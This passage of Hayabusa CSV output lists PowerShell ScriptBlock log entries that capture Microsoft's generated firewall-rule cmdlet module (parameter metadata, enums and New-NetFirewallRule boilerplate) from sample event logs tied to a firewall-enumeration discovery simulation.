<CmdletParameterMetadata PSName=""Package""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Service""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Service""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:InterfaceAlias""> <Type PSType=""System.Management.Automation.WildcardPattern[]""/> <CmdletParameterMetadata PSName=""InterfaceAlias""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:InterfaceType""> <Type PSType=""NetSecurity.InterfaceType""/> <CmdletParameterMetadata PSName=""InterfaceType""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalUser""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""LocalUser""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteUser""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteUser""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteMachine""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteMachine""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Authentication""> <Type PSType=""NetSecurity.Authentication""/> <CmdletParameterMetadata PSName=""Authentication""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Encryption""> <Type PSType=""NetSecurity.Encryption""/> <CmdletParameterMetadata PSName=""Encryption""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:OverrideBlockRules""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""OverrideBlockRules""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayName"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayGroup"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayGroup""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" IsMandatory=""true"" CmdletParameterSets=""ByGroup""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Rename"" ConfirmImpact=""Medium""/> <Method MethodName=""Rename""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Copy"" ConfirmImpact=""Medium""/> <Method MethodName=""CloneObject""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewPolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewPolicyStore""/> </Parameter> <Parameter ParameterName=""NewGPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewGPOSession""/> </Parameter> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Enable"" ConfirmImpact=""Medium""/> <Method MethodName=""Enable""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Disable"" ConfirmImpact=""Medium""/> <Method MethodName=""Disable""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> </Method> </Cmdlet> </InstanceCmdlets> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""New"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:CreateInstance""> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""InstanceID""> <Type PSType=""string""/> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name""/> </Parameter> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""DisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""RuleGroup""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Group""/> </Parameter> <Parameter ParameterName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <CmdletParameterMetadata PSName=""Enabled""/> </Parameter> <Parameter ParameterName=""Profiles""> <Type PSType=""NetSecurity.Profile""/> <CmdletParameterMetadata PSName=""Profile""/> </Parameter> <Parameter ParameterName=""Platforms""> <Type PSType=""string[]""/>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<CmdletParameterMetadata PSName=""Platform""/> </Parameter> <Parameter ParameterName=""Direction""> <Type PSType=""NetSecurity.Direction""/> <CmdletParameterMetadata PSName=""Direction""/> </Parameter> <Parameter ParameterName=""Action""> <Type PSType=""NetSecurity.Action""/> <CmdletParameterMetadata PSName=""Action""/> </Parameter> <Parameter ParameterName=""EdgeTraversalPolicy""> <Type PSType=""NetSecurity.EdgeTraversal""/> <CmdletParameterMetadata PSName=""EdgeTraversalPolicy""/> </Parameter> <Parameter ParameterName=""LooseSourceMapping""> <Type PSType=""boolean""/> <CmdletParameterMetadata Aliases=""LSM"" PSName=""LooseSourceMapping""/> </Parameter> <Parameter ParameterName=""LocalOnlyMapping""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""LocalOnlyMapping""/> </Parameter> <Parameter ParameterName=""Owner""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Owner""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemoteAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Protocol""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Protocol""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalPort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalPort""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemotePort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemotePort""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:IcmpType""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""IcmpType""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:DynamicTransport""> <Type PSType=""NetSecurity.DynamicTransport""/> <CmdletParameterMetadata Aliases=""DynamicTransport"" PSName=""DynamicTarget""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Program""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Program""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Package""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Package""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Service""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Service""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:InterfaceAlias""> <Type PSType=""System.Management.Automation.WildcardPattern[]""/> <CmdletParameterMetadata PSName=""InterfaceAlias""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:InterfaceType""> <Type PSType=""NetSecurity.InterfaceType""/> <CmdletParameterMetadata PSName=""InterfaceType""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalUser""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""LocalUser""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteUser""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteUser""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteMachine""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteMachine""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Authentication""> <Type PSType=""NetSecurity.Authentication""/> <CmdletParameterMetadata PSName=""Authentication""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Encryption""> <Type PSType=""NetSecurity.Encryption""/> <CmdletParameterMetadata PSName=""Encryption""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:OverrideBlockRules""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""OverrideBlockRules""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Show""/> <Method MethodName=""EnumerateFull""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""Dependents""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement""/> <CmdletOutputMetadata PSName=""Dependents""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.Enabled"" UnderlyingType=""uint16""> <Value Name=""True"" Value=""1""/> <Value Name=""False"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.Profile"" UnderlyingType=""uint16"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""Public"" Value=""4""/> <Value Name=""Private"" Value=""2""/> <Value Name=""Domain"" Value=""1""/> <Value Name=""NotApplicable"" Value=""65535""/> </Enum> <Enum EnumName=""NetSecurity.Direction"" UnderlyingType=""uint16""> <Value Name=""Inbound"" Value=""1""/> <Value Name=""Outbound"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.Action"" UnderlyingType=""uint16""> <Value Name=""NotConfigured"" Value=""0""/> <Value Name=""Allow"" Value=""2""/> <Value Name=""Block"" Value=""4""/> </Enum> <Enum EnumName=""NetSecurity.EdgeTraversal"" UnderlyingType=""uint16""> <Value Name=""Block"" Value=""0""/> <Value Name=""Allow"" Value=""1""/> <Value Name=""DeferToUser"" Value=""2""/> <Value Name=""DeferToApp"" Value=""3""/> </Enum> <Enum EnumName=""NetSecurity.PrimaryStatus"" UnderlyingType=""uint16""> <Value Name=""Unknown"" Value=""0""/> <Value Name=""OK"" Value=""1""/> <Value Name=""Inactive"" Value=""2""/> <Value Name=""Error"" Value=""3""/> </Enum> <Enum EnumName=""NetSecurity.PolicyStoreType"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Local"" Value=""1""/> <Value Name=""GroupPolicy"" Value=""2""/> <Value Name=""Dynamic"" Value=""3""/> <Value Name=""Generated"" Value=""4""/> <Value Name=""Hardcoded"" Value=""5""/> </Enum> <Enum EnumName=""NetSecurity.DynamicTransport"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""ProximityApps"" Value=""1""/> <Value Name=""ProximitySharing"" Value=""2""/> <Value Name=""WifiDirectPrinting"" Value=""4""/> <Value Name=""WifiDirectDisplay"" Value=""8""/> <Value Name=""WifiDirectDevices"" Value=""16""/> </Enum> <Enum EnumName=""NetSecurity.InterfaceType"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""Wired"" Value=""1""/> <Value Name=""Wireless"" Value=""2""/> <Value Name=""RemoteAccess"" Value=""4""/> </Enum> <Enum EnumName=""NetSecurity.Authentication"" UnderlyingType=""uint16""> <Value Name=""NotRequired"" Value=""0""/> <Value Name=""Required"" Value=""1""/> <Value Name=""NoEncap"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.Encryption"" UnderlyingType=""uint16""> <Value Name=""NotRequired"" Value=""0""/> <Value Name=""Required"" Value=""1""/> <Value Name=""Dynamic"" Value=""2""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'I",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,n'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 